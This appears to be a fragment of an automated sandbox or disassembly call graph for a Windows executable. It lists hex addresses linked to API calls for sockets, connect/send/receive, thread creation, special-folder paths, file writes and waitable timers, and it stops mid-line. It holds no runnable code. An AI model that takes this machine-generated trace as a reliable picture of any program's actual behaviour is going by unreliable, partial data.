20154 9c1110 Mailbox 68 API calls 20153->20154 20155 9b3c7e 20154->20155 21034 9b3ca2 20155->21034 20160 9b3d7e 20161 9b3dcb htons 20160->20161 20162 9b3d99 htons 20160->20162 21067 9b3c16 20161->21067 21061 9b3bd3 20162->21061 20166 9b3ded 20167 9b8931 20166->20167 20168 9b8949 20167->20168 20169 9b896a 20167->20169 21098 9b9bf3 20168->21098 20172 9b7f6c 20169->20172 21101 9b2ac7 20169->21101 20172->20013 20173 9bad1b 20172->20173 20174 9c1110 Mailbox 68 API calls 20173->20174 20175 9bad35 20174->20175 20176 9b7fb8 20175->20176 21195 9b2db5 20175->21195 20176->20019 20176->20027 20179 9c1110 Mailbox 68 API calls 20178->20179 20184 9b89fb WSASetLastError shutdown 20183->20184 20185 9b89eb 20183->20185 20187 9baaff 69 API calls 20184->20187 20186 9c1110 Mailbox 68 API calls 20185->20186 20188 9b80c7 20186->20188 20189 9b8a18 20187->20189 20191 9b33b2 20188->20191 20189->20188 20190 9c1110 Mailbox 68 API calls 20189->20190 20190->20188 20199 9b9603 __EH_prolog 20198->20199 21272 9b373f 20199->21272 20201 9b961d RtlEnterCriticalSection 20206 9c35ac _malloc 59 API calls 20205->20206 20207 9b5476 SHGetSpecialFolderPathA 20206->20207 20208 9b548c 20207->20208 20208->20208 21281 9c3d71 20208->21281 20211 9b54f6 20211->19999 20213 9b54f0 21297 9c4084 20213->21297 20216 9c287b _LocaleUpdate::_LocaleUpdate 59 API calls 20215->20216 20217 9c2997 20216->20217 20218 9c29a5 20217->20218 20224 9c29bc 20217->20224 20219 9c645b strtoxl 59 API calls 20218->20219 20220 9c29aa 20219->20220 20221 9c54f5 strtoxl 9 API calls 20220->20221 20223 9c29b5 ___ascii_stricmp 20221->20223 20222 9c5f7a 66 API calls __tolower_l 20222->20224 20223->20056 20224->20222 20224->20223 20226 9be600 __EH_prolog 20225->20226 20227 9c414c _Allocate 60 API calls 20226->20227 20228 9be617 20227->20228 20228->20063 20230 9c1139 20229->20230 20231 9b5251 20229->20231 20232 9c39a4 __cinit 68 API calls 20230->20232 20231->20068 20232->20231 20234 9c1110 Mailbox 68 API calls 20233->20234 20235 9bd4e9 20234->20235 20236 9bd5f8 20235->20236 20238 9b2b95 20235->20238 20236->20074 20239 9b2bb1 20238->20239 20240 9b2bc7 20238->20240 20241 9c1110 Mailbox 68 API calls 20239->20241 20243 9b2bd2 20240->20243 20251 9b2bdf 20240->20251 20246 9b2bb6 20241->20246 20242 9b2be2 WSASetLastError WSARecv 20253 9baaff 20242->20253 20245 9c1110 Mailbox 68 API calls 20243->20245 20245->20246 20246->20235 20247 9b2d22 20256 9b1996 20247->20256 20249 9b2cbc WSASetLastError select 20250 9baaff 69 API calls 20249->20250 20250->20251 20251->20242 20251->20246 20251->20247 20251->20249 20252 9c1110 68 API calls Mailbox 20251->20252 20252->20251 20254 9c1110 Mailbox 68 API calls 20253->20254 20255 9bab0b WSAGetLastError 20254->20255 20255->20251 20257 9b199f 20256->20257 20258 9b19bb 20256->20258 20259 9c39a4 __cinit 68 API calls 20257->20259 20258->20246 20259->20258 20282 9be876 20260->20282 20262 9bd6f6 20262->20096 20363 9c39b9 20263->20363 20265 9c2714 20265->20098 20266 9c273d ResumeThread 20266->20098 20268 9c2736 CloseHandle 20268->20266 20270 9c1110 Mailbox 68 API calls 20269->20270 20283 9be880 __EH_prolog 20282->20283 20288 9b4030 20283->20288 20287 9be8ae 20287->20262 20300 9d59f0 20288->20300 20290 9b403a GetProcessHeap RtlAllocateHeap 20291 9b407c 20290->20291 20292 9b4053 std::exception::exception 20290->20292 20291->20287 20294 9b408a 20291->20294 20301 9bacc0 20292->20301 20295 9b4094 __EH_prolog 20294->20295 20345 9ba8df 20295->20345 20300->20290 20302 9bacca __EH_prolog 20301->20302 20309 9bd26f 20302->20309 20315 9bddcf 20309->20315 20312 9bd289 20337 9bde07 20312->20337 20318 9c2b13 20315->20318 20321 9c2b41 20318->20321 20322 9bacd9 20321->20322 20323 9c2b4f 20321->20323 20322->20312 20327 9c2bd7 20323->20327 20328 9c2b54 20327->20328 20329 9c2be0 20327->20329 20328->20322 20331 9c2b99 20328->20331 20330 9c3574 _free 59 API calls 20329->20330 20330->20328 20332 9c2ba5 _strlen 20331->20332 20333 9c2bca 20331->20333 20334 9c35ac _malloc 59 API calls 20332->20334 20333->20322 20335 9c2bb7 20334->20335 20335->20333 20336 9c72bc std::exception::_Copy_str 59 API calls 20335->20336 20336->20333 20338 9bde11 __EH_prolog 20337->20338 20341 9bbd32 20338->20341 20342 9bbd3c __EH_prolog 20341->20342 20343 9c2b13 std::exception::exception 59 API calls 20342->20343 20344 9bbd4d Mailbox 20343->20344 20356 9bb6f6 20345->20356 20347 9b40c1 20348 9b3fdc 20347->20348 20362 9d59f0 20348->20362 20350 9b3fe6 CreateEventA 20351 9b400f 20350->20351 20352 9b3ffd 20350->20352 20351->20287 20353 9b3fb0 Mailbox 68 API calls 20352->20353 20354 9b4005 20353->20354 20355 9bac81 Mailbox 60 API calls 20354->20355 20355->20351 20357 9bb702 20356->20357 20358 9bb712 std::exception::exception 20356->20358 20357->20358 20359 9c414c _Allocate 60 API calls 20357->20359 20358->20347 20360 9c4b5a __CxxThrowException@8 RaiseException 20358->20360 20359->20358 20361 9c0127 20360->20361 20362->20350 20364 9c39db 20363->20364 20365 9c39c7 20363->20365 20367 9c906c __calloc_crt 59 API calls 20364->20367 20366 9c645b strtoxl 59 API calls 20365->20366 20368 9c39cc 20366->20368 20369 9c39e8 20367->20369 20370 9c54f5 strtoxl 9 API calls 20368->20370 20371 9c3a39 20369->20371 20374 9c625a CallCatchBlock 59 API calls 20369->20374 20373 9c270b 20370->20373 20372 9c3574 _free 59 API calls 20371->20372 20375 9c3a3f 20372->20375 20373->20265 20373->20266 20373->20268 20376 9c39f5 20374->20376 20375->20373 20382 9c643a 20375->20382 20377 9c62e1 __initptd 59 API calls 20376->20377 20379 9c39fe CreateThread 20377->20379 20379->20373 20381 9c3a31 GetLastError 20379->20381 20390 9c3b19 20379->20390 20381->20371 20387 9c6427 20382->20387 20388 9c6272 __getptd_noexit 59 API calls 20387->20388 20389 9c642c 20388->20389 20391 9c3b22 __threadstartex@4 20390->20391 20714 9c9c82 IsProcessorFeaturePresent 20711->20714 20715 9c9c96 20714->20715 20716 9c9b3e ___raise_securityfailure 5 API calls 20715->20716 20717 9c3cac 20716->20717 20719 9c2e8b 20718->20719 20720 9c645b strtoxl 59 API calls 20719->20720 20723 9c2e9b _strlen 20719->20723 20721 9c2e90 20720->20721 20722 9c54f5 strtoxl 9 API calls 20721->20722 20722->20723 20723->20117 20727 9c287b _LocaleUpdate::_LocaleUpdate 59 API calls 20726->20727 20728 9c66c5 20727->20728 20729 9c645b strtoxl 59 API calls 20728->20729 20730 9c66ca 20729->20730 20731 9c719b 20730->20731 20740 9c66ea __output_l __aulldvrm _strlen 20730->20740 20771 9ca431 20730->20771 20732 9c645b strtoxl 59 API calls 20731->20732 20734 9c71a0 20732->20734 20735 9c54f5 strtoxl 9 API calls 20734->20735 20736 9c7175 20735->20736 20737 9c4b4b ___strgtold12_l 6 API calls 20736->20737 20738 9c2a76 20737->20738 20738->20142 20750 9c6501 20738->20750 20740->20731 20740->20736 20741 9c71d0 79 API calls _write_multi_char 20740->20741 20742 9c6d53 RtlDecodePointer 20740->20742 20743 9c3574 _free 59 API calls 20740->20743 20744 9c7244 79 API calls _write_string 20740->20744 20745 9d00e4 61 API calls __cftof 20740->20745 20746 9c90b4 __malloc_crt 59 API calls 20740->20746 20747 9c6db6 RtlDecodePointer 20740->20747 20748 9c6ddb RtlDecodePointer 20740->20748 20749 9c7218 79 API calls _write_multi_char 20740->20749 20778 9ce30e 20740->20778 20741->20740 20742->20740 20743->20740 20744->20740 20745->20740 20746->20740 20747->20740 20748->20740 20749->20740 20751 9ca431 __filbuf 59 API calls 20750->20751 20752 9c650f 20751->20752 20753 9c651a 20752->20753 20754 9c6531 20752->20754 20755 9c645b strtoxl 59 API calls 20753->20755 20756 9c6536 20754->20756 20764 9c6543 __flsbuf 20754->20764 20765 9c651f 20755->20765 20757 9c645b strtoxl 59 API calls 20756->20757 20757->20765 20758 9c659d 20759 9c65a7 20758->20759 20760 9c6621 20758->20760 20762 9c65c1 20759->20762 20767 9c65d8 20759->20767 20761 9ca455 __write 79 API calls 20760->20761 20761->20765 20793 9ca455 20762->20793 20764->20758 20764->20765 20768 9c6592 20764->20768 20781 9cfda2 20764->20781 20765->20142 20767->20765 20821 9cfdf6 20767->20821 20768->20758 20790 9cff65 20768->20790 20772 9ca43b 20771->20772 20773 9ca450 20771->20773 20774 9c645b strtoxl 59 API calls 20772->20774 20773->20740 20775 9ca440 20774->20775 20776 9c54f5 strtoxl 9 API calls 20775->20776 20777 9ca44b 20776->20777 20777->20740 20779 9c287b _LocaleUpdate::_LocaleUpdate 59 API calls 20778->20779 20780 9ce31f 20779->20780 20780->20740 20782 9cfdad 20781->20782 20783 9cfdba 20781->20783 20784 9c645b strtoxl 59 API calls 20782->20784 20785 9cfdc6 20783->20785 20786 9c645b strtoxl 59 API calls 20783->20786 20787 9cfdb2 20784->20787 20785->20768 20788 9cfde7 20786->20788 20787->20768 20789 9c54f5 strtoxl 9 API calls 20788->20789 20789->20787 20791 9c90b4 __malloc_crt 59 API calls 20790->20791 20792 9cff7a 20791->20792 20792->20758 20794 9ca461 CallCatchBlock 20793->20794 20795 9ca46e 20794->20795 20796 9ca485 20794->20796 20797 9c6427 __read_nolock 59 API calls 20795->20797 20798 9ca524 20796->20798 20800 9ca499 20796->20800 20799 9ca473 20797->20799 20801 9c6427 __read_nolock 59 API calls 20798->20801 20802 9c645b strtoxl 59 API calls 20799->20802 20803 9ca4b7 20800->20803 20804 9ca4c1 20800->20804 20805 9ca4bc 20801->20805 20806 9ca47a CallCatchBlock 20802->20806 20807 9c6427 __read_nolock 59 API calls 20803->20807 20846 9d1287 20804->20846 20810 9c645b strtoxl 59 API calls 20805->20810 20806->20765 20807->20805 20809 9ca4c7 20811 9ca4ed 20809->20811 20812 9ca4da 20809->20812 20813 9ca530 20810->20813 20816 9c645b strtoxl 59 API calls 20811->20816 20855 9ca544 20812->20855 20815 9c54f5 strtoxl 9 API calls 20813->20815 20815->20806 20817 9ca4f2 20816->20817 20819 9c6427 __read_nolock 59 API calls 20817->20819 20818 9ca4e6 20914 9ca51c 20818->20914 20819->20818 20822 9cfe02 CallCatchBlock 20821->20822 20823 9cfe2b 20822->20823 20824 9cfe13 20822->20824 20826 9cfed0 20823->20826 20830 9cfe60 20823->20830 20825 9c6427 __read_nolock 59 API calls 20824->20825 20828 9cfe18 20825->20828 20827 9c6427 __read_nolock 59 API calls 20826->20827 20829 9cfed5 20827->20829 20831 9c645b strtoxl 59 API calls 20828->20831 20832 9c645b strtoxl 59 API calls 20829->20832 20833 9d1287 ___lock_fhandle 60 API calls 20830->20833 20834 9cfe20 CallCatchBlock 20831->20834 20835 9cfedd 20832->20835 20836 9cfe66 20833->20836 20834->20765 20837 9c54f5 strtoxl 9 API calls 20835->20837 20838 9cfe7c 20836->20838 20839 9cfe94 20836->20839 20837->20834 20840 9cfef2 __lseeki64_nolock 61 API calls 20838->20840 20841 9c645b strtoxl 59 API calls 20839->20841 20842 9cfe8b 20840->20842 20843 9cfe99 20841->20843 20947 9cfec8 20842->20947 20844 9c6427 __read_nolock 59 API calls 20843->20844 20844->20842 20847 9d1293 CallCatchBlock 20846->20847 20848 9d12e2 RtlEnterCriticalSection 20847->20848 20849 9c8eed __lock 59 API calls 20847->20849 20850 9d1308 CallCatchBlock 20848->20850 20852 9d12b8 20849->20852 20850->20809 20851 9d12d0 20917 9d130c 20851->20917 20852->20851 20853 9c980c __mtinitlocks InitializeCriticalSectionAndSpinCount 20852->20853 20853->20851 20856 9ca551 __write_nolock 20855->20856 20857 9ca585 20856->20857 20858 9ca5af 20856->20858 20859 9ca590 20856->20859 20860 9c4b4b ___strgtold12_l 6 API calls 20857->20860 20864 9ca607 20858->20864 20865 9ca5eb 20858->20865 20861 9c6427 __read_nolock 59 API calls 20859->20861 20862 9cada5 20860->20862 20863 9ca595 20861->20863 20862->20818 20866 9c645b strtoxl 59 API calls 20863->20866 20867 9ca620 20864->20867 20921 9cfef2 20864->20921 20868 9c6427 __read_nolock 59 API calls 20865->20868 20869 9ca59c 20866->20869 20871 9cfda2 __read_nolock 59 API calls 20867->20871 20872 9ca5f0 20868->20872 20873 9c54f5 strtoxl 9 API calls 20869->20873 20874 9ca62e 20871->20874 20875 9c645b strtoxl 59 API calls 20872->20875 20873->20857 20877 9ca987 20874->20877 20881 9c625a CallCatchBlock 59 API calls 20874->20881 20876 9ca5f7 20875->20876 20878 9c54f5 strtoxl 9 API calls 20876->20878 20879 9cad1a WriteFile 20877->20879 20880 9ca9a5 20877->20880 20878->20857 20882 9ca97a GetLastError 20879->20882 20891 9ca947 20879->20891 20883 9caac9 20880->20883 20889 9ca9bb 20880->20889 20885 9ca65a GetConsoleMode 20881->20885 20882->20891 20892 9caad4 20883->20892 20907 9cabbe 20883->20907 20884 9cad53 20884->20857 20890 9c645b strtoxl 59 API calls 20884->20890 20885->20877 20886 9ca699 20885->20886 20886->20877 20887 9ca6a9 GetConsoleCP 20886->20887 20887->20884 20909 9ca6d8 20887->20909 20888 9caa2a WriteFile 20888->20882 20888->20889 20889->20884 20889->20888 20889->20891 20893 9cad81 20890->20893 20891->20857 20891->20884 20894 9caaa7 20891->20894 20892->20884 20892->20891 20896 9cab39 WriteFile 20892->20896 20897 9c6427 __read_nolock 59 API calls 20893->20897 20898 9cad4a 20894->20898 20899 9caab2 20894->20899 20895 9cac33 WideCharToMultiByte 20895->20882 20895->20907 20896->20882 20896->20892 20897->20857 20900 9c643a __dosmaperr 59 API calls 20898->20900 20901 9c645b strtoxl 59 API calls 20899->20901 20900->20857 20903 9caab7 20901->20903 20902 9cac82 WriteFile 20906 9cacd5 GetLastError 20902->20906 20902->20907 20904 9c6427 __read_nolock 59 API calls 20903->20904 20904->20857 20906->20907 20907->20884 20907->20891 20907->20895 20907->20902 20908 9d1653 WriteConsoleW CreateFileW __putwch_nolock 20908->20909 20909->20882 20909->20891 20909->20908 20910 9ca7c1 WideCharToMultiByte 20909->20910 20911 9d060a 61 API calls __write_nolock 20909->20911 20913 9ca856 WriteFile 20909->20913 20930 9ce348 20909->20930 20910->20891 20912 9ca7fc WriteFile 20910->20912 20911->20909 20912->20882 20912->20909 20913->20882 20913->20909 20946 9d162d RtlLeaveCriticalSection 20914->20946 20916 9ca522 20916->20806 20920 9c9057 RtlLeaveCriticalSection 20917->20920 20919 9d1313 20919->20848 20920->20919 20933 9d1544 20921->20933 20923 9cff02 20924 9cff0a 20923->20924 20925 9cff1b SetFilePointerEx 20923->20925 20926 9c645b strtoxl 59 API calls 20924->20926 20927 9cff33 GetLastError 20925->20927 20928 9cff0f 20925->20928 20926->20928 20929 9c643a __dosmaperr 59 API calls 20927->20929 20928->20867 20929->20928 20931 9ce30e __isleadbyte_l 59 API calls 20930->20931 20932 9ce355 20931->20932 20932->20909 20934 9d154f 20933->20934 20935 9d1564 20933->20935 20936 9c6427 __read_nolock 59 API calls 20934->20936 20938 9c6427 __read_nolock 59 API calls 20935->20938 20940 9d1589 20935->20940 20937 9d1554 20936->20937 20939 9c645b strtoxl 59 API calls 20937->20939 20941 9d1593 20938->20941 20944 9d155c 20939->20944 20940->20923 20942 9c645b strtoxl 59 API calls 20941->20942 20943 9d159b 20942->20943 20945 9c54f5 strtoxl 9 API calls 20943->20945 20944->20923 20945->20944 20946->20916 20950 9d162d RtlLeaveCriticalSection 20947->20950 20949 9cfece 20949->20834 20950->20949 20951->20146 20953 9be930 __EH_prolog 20952->20953 20954 9c414c _Allocate 60 API calls 20953->20954 20955 9be939 20954->20955 20956 9b1bfa RtlEnterCriticalSection 20955->20956 20958 9beb47 20955->20958 20956->20151 20959 9beb51 __EH_prolog 20958->20959 20962 9b26db RtlEnterCriticalSection 20959->20962 20961 9beba7 20961->20956 20963 9b2728 CreateWaitableTimerA 20962->20963 20964 9b277e 20962->20964 20965 9b275b SetWaitableTimer 20963->20965 20966 9b2738 GetLastError 20963->20966 20967 9b27d5 RtlLeaveCriticalSection 20964->20967 20969 9c414c _Allocate 60 API calls 20964->20969 20965->20964 20968 9c1110 Mailbox 68 API calls 20966->20968 20967->20961 20970 9b2745 20968->20970 20971 9b278a 20969->20971 21006 9b1712 20970->21006 20973 9c414c _Allocate 60 API calls 20971->20973 20974 9b27c8 20971->20974 20975 9b27a9 20973->20975 21012 9b83f9 20974->21012 20978 9b1cf8 CreateEventA 20975->20978 20979 9b1d23 GetLastError 20978->20979 20980 9b1d52 CreateEventA 20978->20980 20983 9b1d33 20979->20983 20981 9b1d6b GetLastError 20980->20981 20982 9b1d96 20980->20982 20986 9b1d7b 20981->20986 20984 9c39b9 __beginthreadex 201 API calls 20982->20984 20985 9c1110 Mailbox 68 API calls 20983->20985 20987 9b1db6 20984->20987 20990 9b1d3c 20985->20990 20991 9c1110 Mailbox 68 API calls 20986->20991 20988 9b1e0d 20987->20988 20989 9b1dc6 GetLastError 20987->20989 20994 9b1e1d 20988->20994 20995 9b1e11 WaitForSingleObject FindCloseChangeNotification 20988->20995 20996 9b1dd8 20989->20996 20992 9b1712 60 API calls 20990->20992 20993 9b1d84 20991->20993 20997 9b1d4e 20992->20997 20998 9b1712 60 API calls 20993->20998 20994->20974 20995->20994 20999 9b1ddf 20996->20999 21000 9b1ddc CloseHandle 20996->21000 20997->20980 20998->20982 21001 9b1de9 CloseHandle 20999->21001 21002 9b1dee 20999->21002 21000->20999 21001->21002 21003 9c1110 Mailbox 68 API calls 21002->21003 21004 9b1dfb 21003->21004 21005 9b1712 60 API calls 21004->21005 21005->20988 21007 9b171c __EH_prolog 21006->21007 21008 9b173e 21007->21008 21009 9b1815 Mailbox 59 API calls 21007->21009 21008->20965 21010 9b1732 21009->21010 21015 9baa98 21010->21015 21013 9b8415 21012->21013 21014 9b8406 CloseHandle 21012->21014 21013->20967 21014->21013 21016 9baaa2 __EH_prolog 21015->21016 21023 9bcffd 21016->21023 21020 9baac3 21021 9c4b5a __CxxThrowException@8 RaiseException 21020->21021 21022 9baad1 21021->21022 21024 9bb824 std::bad_exception::bad_exception 60 API calls 21023->21024 21025 9baab5 21024->21025 21026 9bd039 21025->21026 21027 9bd043 __EH_prolog 21026->21027 21030 9bb7d3 21027->21030 21029 9bd072 Mailbox 21029->21020 21031 9bb7dd __EH_prolog 21030->21031 21032 9bb824 std::bad_exception::bad_exception 60 API calls 21031->21032 21033 9bb7ee Mailbox 21032->21033 21033->21029 21045 9b30ae WSASetLastError 21034->21045 21037 9b30ae 71 API calls 21038 9b3c90 21037->21038 21039 9b16ae 21038->21039 21041 9b16b8 __EH_prolog 21039->21041 21040 9b1701 21040->20160 21041->21040 21042 9c2ad3 std::exception::exception 59 API calls 21041->21042 21043 9b16dc 21042->21043 21044 9baa98 60 API calls 21043->21044 21044->21040 21046 9b30ce 21045->21046 21047 9b30ec WSAStringToAddressA 21045->21047 21046->21047 21049 9b30d3 21046->21049 21048 9baaff 69 API calls 21047->21048 21050 9b3114 21048->21050 21051 9c1110 Mailbox 68 API calls 21049->21051 21052 9b3154 21050->21052 21055 9b311e _memcmp 21050->21055 21060 9b30d8 21051->21060 21053 9b3135 21052->21053 21058 9c1110 Mailbox 68 API calls 21052->21058 21054 9b3193 21053->21054 21056 9c1110 Mailbox 68 API calls 21053->21056 21059 9c1110 Mailbox 68 API calls 21054->21059 21054->21060 21055->21053 21057 9c1110 Mailbox 68 API calls 21055->21057 21056->21054 21057->21053 21058->21053 21059->21060 21060->21037 21060->21038 21062 9b3bdd __EH_prolog 21061->21062 21063 9b3bfe htonl htonl 21062->21063 21073 9c2ab7 21062->21073 21063->20166 21068 9b3c20 __EH_prolog 21067->21068 21069 9b3c41 21068->21069 21070 9c2ab7 std::bad_exception::bad_exception 59 API calls 21068->21070 21069->20166 21071 9b3c35 21070->21071 21072 9bac4d 60 API calls 21071->21072 21072->21069 21074 9c2ad3 std::exception::exception 59 API calls 21073->21074 21075 9b3bf2 21074->21075 21076 9bac4d 21075->21076 21077 9bac57 __EH_prolog 21076->21077 21084 9bd170 21077->21084 21091 9c2a9c 21084->21091 21087 9bd1ac 21088 9bd1b6 __EH_prolog 21087->21088 21094 9bbb42 21088->21094 21092 9c2b13 std::exception::exception 59 API calls 21091->21092 21093 9bac64 21092->21093 21093->21087 21095 9bbb4c __EH_prolog 21094->21095 21096 9c2a9c std::bad_exception::bad_exception 59 API calls 21095->21096 21119 9b353e 21098->21119 21102 9b2ae8 WSASetLastError connect 21101->21102 21103 9b2ad8 21101->21103 21105 9baaff 69 API calls 21102->21105 21104 9c1110 Mailbox 68 API calls 21103->21104 21106 9b2add 21104->21106 21107 9b2b07 21105->21107 21108 9c1110 Mailbox 68 API calls 21106->21108 21107->21106 21109 9c1110 Mailbox 68 API calls 21107->21109 21110 9b2b1b 21108->21110 21109->21106 21111 9c1110 Mailbox 68 API calls 21110->21111 21113 9b2b38 21110->21113 21111->21113 21115 9b2b87 21113->21115 21179 9b3027 21113->21179 21115->20172 21120 9b3548 __EH_prolog 21119->21120 21121 9b3557 21120->21121 21122 9b3576 21120->21122 21123 9b1996 68 API calls 21121->21123 21141 9b2edd WSASetLastError WSASocketA 21122->21141 21140 9b355f 21123->21140 21126 9b35ad CreateIoCompletionPort 21127 9b35db 21126->21127 21128 9b35c5 GetLastError 21126->21128 21130 9c1110 Mailbox 68 API calls 21127->21130 21129 9c1110 Mailbox 68 API calls 21128->21129 21140->20169 21142 9c1110 Mailbox 68 API calls 21141->21142 21143 9b2f0a WSAGetLastError 21142->21143 21144 9b2f41 21143->21144 21145 9b2f21 21143->21145 21144->21126 21144->21140 21146 9b2f3c 21145->21146 21147 9b2f27 setsockopt 21145->21147 21148 9c1110 Mailbox 68 API calls 21146->21148 21147->21146 21148->21144 21180 9b303b 21179->21180 21181 9b304d WSASetLastError select 21179->21181 21183 9c1110 Mailbox 68 API calls 21180->21183 21182 9baaff 69 API calls 21181->21182 21196 9b2dca 21195->21196 21197 9b2de4 21195->21197 21199 9c1110 Mailbox 68 API calls 21196->21199 21198 9b2dfc 21197->21198 21200 9b2def 21197->21200 21209 9b2d39 WSASetLastError WSASend 21198->21209 21203 9b2dcf 21199->21203 21202 9c1110 Mailbox 68 API calls 21200->21202 21202->21203 21203->20175 21210 9baaff 69 API calls 21209->21210 21211 9b2d6e 21210->21211 21212 9b2d82 21211->21212 21213 9b2d75 21211->21213 21273 9b3770 21272->21273 21274 9b3755 InterlockedCompareExchange 21272->21274 21276 9c1110 Mailbox 68 API calls 21273->21276 21274->21273 21275 9b3765 21274->21275 21277 9b32ab 78 API calls 21275->21277 21278 9b3779 21276->21278 21277->21273 21279 9b29ee 76 API calls 21278->21279 21280 9b378e 21279->21280 21280->20201 21310 9c3cad 21281->21310 21283 9b54dc 21283->20211 21284 9c3f06 21283->21284 21285 9c3f12 CallCatchBlock 21284->21285 21286 9c3f48 21285->21286 21287 9c3f30 21285->21287 21289 9c3f40 CallCatchBlock 21285->21289 21452 9c9df2 21286->21452 21288 9c645b strtoxl 59 API calls 21287->21288 21291 9c3f35 21288->21291 21289->20213 21293 9c54f5 strtoxl 9 API calls 21291->21293 21293->21289 21298 9c4090 CallCatchBlock 21297->21298 21299 9c40bc 21298->21299 21300 9c40a4 21298->21300 21303 9c9df2 __lock_file 60 API calls 21299->21303 21306 9c40b4 CallCatchBlock 21299->21306 21301 9c645b strtoxl 59 API calls 21300->21301 21302 9c40a9 21301->21302 21304 9c54f5 strtoxl 9 API calls 21302->21304 21305 9c40ce 21303->21305 21304->21306 21479 9c4018 21305->21479 21306->20211 21313 9c3cb9 CallCatchBlock 21310->21313 21311 9c3ccb 21312 9c645b strtoxl 59 API calls 21311->21312 21314 9c3cd0 21312->21314 21313->21311 21315 9c3cf8 21313->21315 21316 9c54f5 strtoxl 9 API calls 21314->21316 21329 9c9ec8 21315->21329 21326 9c3cdb CallCatchBlock @_EH4_CallFilterFunc@8 21316->21326 21318 9c3cfd 21319 9c3d06 21318->21319 21320 9c3d13 21318->21320 21321 9c645b strtoxl 59 API calls 21319->21321 21322 9c3d3c 21320->21322 21323 9c3d1c 21320->21323 21321->21326 21344 9c9fe7 21322->21344 21324 9c645b strtoxl 59 API calls 21323->21324 21324->21326 21326->21283 21330 9c9ed4 CallCatchBlock 21329->21330 21331 9c8eed __lock 59 API calls 21330->21331 21342 9c9ee2 21331->21342 21332 9c9f56 21374 9c9fde 21332->21374 21333 9c9f5d 21335 9c90b4 __malloc_crt 59 API calls 21333->21335 21337 9c9f64 21335->21337 21336 9c9fd3 CallCatchBlock 21336->21318 21337->21332 21340 9c980c __mtinitlocks InitializeCriticalSectionAndSpinCount 21337->21340 21338 9c8f75 __mtinitlocknum 59 API calls 21338->21342 21341 9c9f8a RtlEnterCriticalSection 21340->21341 21341->21332 21342->21332 21342->21333 21342->21338 21364 9c9e31 21342->21364 21369 9c9e9b 21342->21369 21353 9ca004 21344->21353 21345 9ca018 21347 9c645b strtoxl 59 API calls 21345->21347 21346 9ca1bf 21346->21345 21349 9ca21b 21346->21349 21348 9ca01d 21347->21348 21350 9c54f5 strtoxl 9 API calls 21348->21350 21385 9d0e30 21349->21385 21352 9c3d47 21350->21352 21361 9c3d69 21352->21361 21353->21345 21353->21346 21379 9d0e4e 21353->21379 21358 9d0f7d __openfile 59 API calls 21359 9ca1d7 21358->21359 21359->21346 21360 9d0f7d __openfile 59 API calls 21359->21360 21360->21346 21445 9c9e61 21361->21445 21363 9c3d6f 21363->21326 21365 9c9e3c 21364->21365 21366 9c9e52 RtlEnterCriticalSection 21364->21366 21367 9c8eed __lock 59 API calls 21365->21367 21366->21342 21368 9c9e45 21367->21368 21368->21342 21370 9c9ebc RtlLeaveCriticalSection 21369->21370 21371 9c9ea9 21369->21371 21370->21342 21377 9c9057 RtlLeaveCriticalSection 21371->21377 21373 9c9eb9 21373->21342 21378 9c9057 RtlLeaveCriticalSection 21374->21378 21376 9c9fe5 21376->21336 21377->21373 21378->21376 21388 9d0e66 21379->21388 21381 9ca185 21381->21345 21382 9d0f7d 21381->21382 21396 9d0f95 21382->21396 21384 9ca1b8 21384->21346 21384->21358 21403 9d0d19 21385->21403 21387 9d0e49 21387->21352 21389 9d0e7b 21388->21389 21395 9d0e74 21388->21395 21390 9c287b _LocaleUpdate::_LocaleUpdate 59 API calls 21389->21390 21391 9d0e88 21390->21391 21392 9c645b strtoxl 59 API calls 21391->21392 21391->21395 21393 9d0ebb 21392->21393 21394 9c54f5 strtoxl 9 API calls 21393->21394 21394->21395 21395->21381 21397 9c287b _LocaleUpdate::_LocaleUpdate 59 API calls 21396->21397 21398 9d0fa8 21397->21398 21399 9c645b strtoxl 59 API calls 21398->21399 21402 9d0fbd 21398->21402 21400 9d0fe9 21399->21400 21401 9c54f5 strtoxl 9 API calls 21400->21401 21401->21402 21402->21384 21406 9d0d25 CallCatchBlock 21403->21406 21404 9d0d3b 21405 9c645b strtoxl 59 API calls 21404->21405 21407 9d0d40 21405->21407 21406->21404 21408 9d0d71 21406->21408 21410 9c54f5 strtoxl 9 API calls 21407->21410 21414 9d0de2 21408->21414 21413 9d0d4a CallCatchBlock 21410->21413 21413->21387 21423 9c8836 21414->21423 21416 9d0d8d 21419 9d0db6 21416->21419 21417 9d0df6 21417->21416 21418 9c3574 _free 59 API calls 21417->21418 21418->21416 21420 9d0dbc 21419->21420 21421 9d0de0 21419->21421 21444 9d162d RtlLeaveCriticalSection 21420->21444 21421->21413 21424 9c8859 21423->21424 21425 9c8843 21423->21425 21424->21425 21427 9c8860 ___crtIsPackagedApp 21424->21427 21426 9c645b strtoxl 59 API calls 21425->21426 21428 9c8848 21426->21428 21430 9c8869 AreFileApisANSI 21427->21430 21431 9c8876 MultiByteToWideChar 21427->21431 21429 9c54f5 strtoxl 9 API calls 21428->21429 21439 9c8852 21429->21439 21430->21431 21432 9c8873 21430->21432 21433 9c8890 GetLastError 21431->21433 21434 9c88a1 21431->21434 21432->21431 21435 9c643a __dosmaperr 59 API calls 21433->21435 21436 9c90b4 __malloc_crt 59 API calls 21434->21436 21435->21439 21437 9c88a9 21436->21437 21438 9c88b0 MultiByteToWideChar 21437->21438 21437->21439 21438->21439 21440 9c88c6 GetLastError 21438->21440 21439->21417 21441 9c643a __dosmaperr 59 API calls 21440->21441 21442 9c88d2 21441->21442 21443 9c3574 _free 59 API calls 21442->21443 21443->21439 21444->21421 21446 9c9e8f RtlLeaveCriticalSection 21445->21446 21447 9c9e70 21445->21447 21446->21363 21447->21446 21448 9c9e77 21447->21448 21451 9c9057 RtlLeaveCriticalSection 21448->21451 21450 9c9e8c 21450->21363 21451->21450 21453 9c9e24 RtlEnterCriticalSection 21452->21453 21454 9c9e02 21452->21454 21456 9c3f4e 21453->21456 21454->21453 21455 9c9e0a 21454->21455 21457 9c8eed __lock 59 API calls 21455->21457 21458 9c3dad 21456->21458 21457->21456 21460 9c3dbc 21458->21460 21465 9c3dda 21458->21465 21459 9c3dca 21461 9c645b strtoxl 59 API calls 21459->21461 21460->21459 21460->21465 21468 9c3df4 _memmove 21460->21468 21462 9c3dcf 21461->21462 21463 9c54f5 strtoxl 9 API calls 21462->21463 21463->21465 21464 9c6501 __flsbuf 79 API calls 21464->21468 21470 9c3f80 21465->21470 21467 9ca431 __filbuf 59 API calls 21467->21468 21468->21464 21468->21465 21468->21467 21469 9ca455 __write 79 API calls 21468->21469 21473 9cadef 21468->21473 21469->21468 21471 9c9e61 __fsopen 2 API calls 21470->21471 21472 